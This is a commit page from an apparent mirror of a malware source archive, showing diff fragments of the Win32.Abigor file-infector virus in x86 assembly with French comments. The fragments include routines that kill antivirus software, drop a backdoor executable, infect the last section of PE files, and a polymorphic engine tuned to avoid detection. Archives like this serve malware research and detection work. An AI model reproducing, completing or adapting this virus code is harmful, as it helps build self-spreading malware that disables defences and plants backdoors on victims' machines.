13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 00:18:34 +00:00

Rename Win32/Win32.Abigor.ASM to Win32/Infector/Win32.Abigor.ASM

This commit is contained in:
vxunderground 2020-10-28 23:13:34 -05:00 committed by GitHub
parent 59acb78c99
commit 7eaec4c565
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -368,7 +368,7 @@ assume fs:nothing
CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs
CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs
lea eax, dword ptr [ebp + TS_Win]
push eax
@ -376,7 +376,7 @@ assume fs:nothing
lea eax, dword ptr [ebp + szFindWindowA]
Call U32Api
or eax, eax
jnz no_drop ; Backdoor déjà implanté sur notre système ?
jnz no_drop ; Backdoor déjà implanté sur notre système ?
Call Drop_BackDoor ; non ??? implantons !!
@ -2733,7 +2733,7 @@ Backdoor db "DABACKDOOR.EXE",0
inc byte ptr [ebp+InfectionCtr]
add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section
add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section
add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section
mov edi, eax
@ -3999,7 +3999,7 @@ Make_Random_Blk proc uses ecx ebx edx esi
Call Push_Pop_blk
.ELSEIF eax == 11
Call MediumBlk
.ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.)
.ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.)
Call Branch_blk
.ELSEIF eax == 17
Call MemAccess_blk
@ -4579,7 +4579,7 @@ SkipDirectCMP:
jmp @Method2
@Method1:
mov ebx,dword ptr [_LoopOFS]
sub ebx,edi ; adresse où sauter
sub ebx,edi ; adresse où sauter
xor eax,eax
@ -4678,7 +4678,7 @@ SkipDirectCMP:
push ebx
mov edx, edi
mov ebx,dword ptr [_LoopOFS]
sub ebx,edi ; adresse où sauter
sub ebx,edi ; adresse où sauter
CALL GEN_JMP_OFS
sub edx, edi
neg edx
@ -5594,7 +5594,7 @@ ModifyKey proc uses ecx ebx edx
ModifyKey endp
;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
; Call Get2RandRegs
; mov ch, cl
@ -6225,7 +6225,7 @@ InstrTBL dd OFFSET GEN_ADD_REG32_IMM;---
;dd OFFSET GEN_ONEBYTE
;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX
;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX
;dd OFFSET GEN_MUL_REG32
dd OFFSET GEN_INC_REG8
@ -6242,7 +6242,7 @@ MEMSTART equ $
dd OFFSET GEN_LEA_REG32_DISP32
dd OFFSET GEN_XADD_REG32_REG32
dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one
dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one
MEMEND equ $
MEMSTARTNBR = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4)
TOTALNBR = (OFFSET $ - OFFSET InstrTBL) / 4